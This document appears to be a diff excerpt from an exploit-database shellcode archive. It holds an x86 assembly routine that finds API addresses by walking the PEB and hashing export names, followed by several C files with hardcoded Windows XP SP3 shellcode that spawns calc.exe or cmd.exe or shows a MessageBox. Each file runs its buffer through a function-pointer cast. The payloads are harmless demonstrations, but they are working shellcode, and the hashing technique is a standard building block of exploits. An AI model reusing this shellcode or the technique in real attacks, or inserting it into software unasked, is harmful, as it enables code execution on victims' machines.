%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
%ifdef STACK_ALIGN
AND SP, 0xFFFC
%endif
find_hash: ; Find ntdll's InInitOrder list of modules:
XOR ESI, ESI ; ESI = 0
PUSH ESI ; Stack = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30])
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address
MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name)
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0
CDQ ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI]
ROR DX, BYTE hash_ror_value
SCASB
JNE hash_loop
CMP DX, hash_user32_MessageBoxA
JE found_MessageBoxA ;
CMP DX, hash_kernel32_LoadLibraryA
LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function
JNE next_module ; Not the right hash and no functions left in module? Next module
found_MessageBoxA:
; Found the right hash: get the address of the function:
MOV EDX, [EBX + 0x24] ; EDX = offset ordinals table
ADD EDX, EBP ; EDX = &oridinals table
MOVZX EDX, WORD [EDX + 2 * ECX] ; EDX = ordinal number of function
MOV EDI, [EBX + 0x1C] ; EDI = offset address table
ADD EDI, EBP ; EDI = &address table
ADD EBP, [EDI + 4 * EDX] ; EBP = &(function)
TEST ESI, ESI
JZ show_MesageBoxA
PUSH B2DW('3', '2', ' ', ' ') ; Stack = "er32", 0
PUSH B2DW('u', 's', 'e', 'r') ; Stack = " user32", 0
PUSH ESP ; Stack = &(" user32"), " user32", 0
CALL EBP ; LoadLibraryA(&(" user32"));
XCHG EAX, EBP ; EBP = &(user32.dll)
XOR ESI, ESI ; ESI = 0
PUSH ESI ; Stack = 0, " user32", 0
JMP get_proc_address_loop
show_MesageBoxA:
; create the "Hello world!" string
PUSH B2DW('r', 'l', 'd', '!') ; Stack = "rld!", 0, " user32", 0
PUSH B2DW('o', ' ', 'w', 'o') ; Stack = "o world!", 0, " user32", 0
PUSH B2DW('H', 'e', 'l', 'l') ; Stack = "Hello world!", 0, " user32", 0
PUSH ESP ; Stack = &("Hello world!"), "Hello world!", 0, " user32", 0
XCHG EAX, [ESP] ; Stack = 0, "Hello world!", 0, " user32", 0
PUSH EAX ; Stack = &("Hello world!"), 0, "Hello world!", 0, " user32", 0
PUSH EAX ; Stack = &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0, " user32", 0
PUSH ESI ; Stack = 0, &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0, " user32", 0
CALL EBP ; MessageBoxA(NULL, &("Hello world!"), &("Hello world!"), MB_OK);
INT3 ; Crash

32
shellcodes/windows_x86/43769.c Normal file
View file

@ -0,0 +1,32 @@
# Title : win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
# Proof : http://img443.imageshack.us/img443/7900/proofaz.jpg
# Author : ZoRLu
# mail-msn : admin@yildirimordulari.com
# Home : z0rlu.blogspot.com
# Date : 14/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\x31\xc0\x31\xdb\x31\xd9\x31\xd2\xeb\x35\x59\x88\x51\x0a\xbb\x7b\x1d"
"\x80\x7c\x51\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x30"
"\xae\x80\x7c\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x07\x52\x52\x51\x52"
"\xff\xd0\x31\xd2\x50\xb8\xfa\xca\x81\x7c\xff\xd0\xe8\xc6\xff\xff\xff"
"\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc4\xff\xff\xff\x4d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc4\xff\xff\xff\x69"
"\x74\x73\x20\x6f\x6b\x21\xff";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}

29
shellcodes/windows_x86/43770.c Normal file
View file

@ -0,0 +1,29 @@
# Title : win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes
# Proof : http://img178.imageshack.us/img178/548/proofxw.jpg
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 15/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"
"\x78\x65";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}

29
shellcodes/windows_x86/43771.c Normal file
View file

@ -0,0 +1,29 @@
# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes
# Proof : http://img59.imageshack.us/img59/6499/proofc.png
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 15/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x12\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x6d\x64\x2e\x65\x78"
"\x65";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}

51
shellcodes/windows_x86/43772.c Normal file
View file

@ -0,0 +1,51 @@
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
# Proof : http://img36.imageshack.us/img36/1183/cmdm.jpg
# Plat. : win32 / windows
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 01/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Okudugumuz icin Cezalandiran Sistemin amina koyim / Kpss Anani ...
# Lakirdi : Son 31 Gun
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
"\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
"\x65\x20\x2f\x63\x20\x63\x6d\x64";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}

24
shellcodes/windows_x86/43773.c Normal file
View file

@ -0,0 +1,24 @@
/*------------------------------------------------------------------------
Title...................Windows XP SP3 EN Calc Shellcode 16 Bytes
Release Date............12/7/2010
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------*/
int main(int argc, char *argv[])
{
char shellcode[] =
"\x31\xC9" // xor ecx,ecx
"\x51" // push ecx
"\x68\x63\x61\x6C\x63" // push 0x636c6163
"\x54" // push dword ptr esp
"\xB8\xC7\x93\xC2\x77" // mov eax,0x77c293c7
"\xFF\xD0"; // call eax
((void(*)())shellcode)();
return 0;
}

19
shellcodes/windows_x86/43774.c Normal file
View file

@ -0,0 +1,19 @@
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( run MessageBox that show an error message )
website : Www.AttackerZ.ir
spt : All firends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
int main(int argc, char **argv)
{
((void (*)())code)();
return 0;
}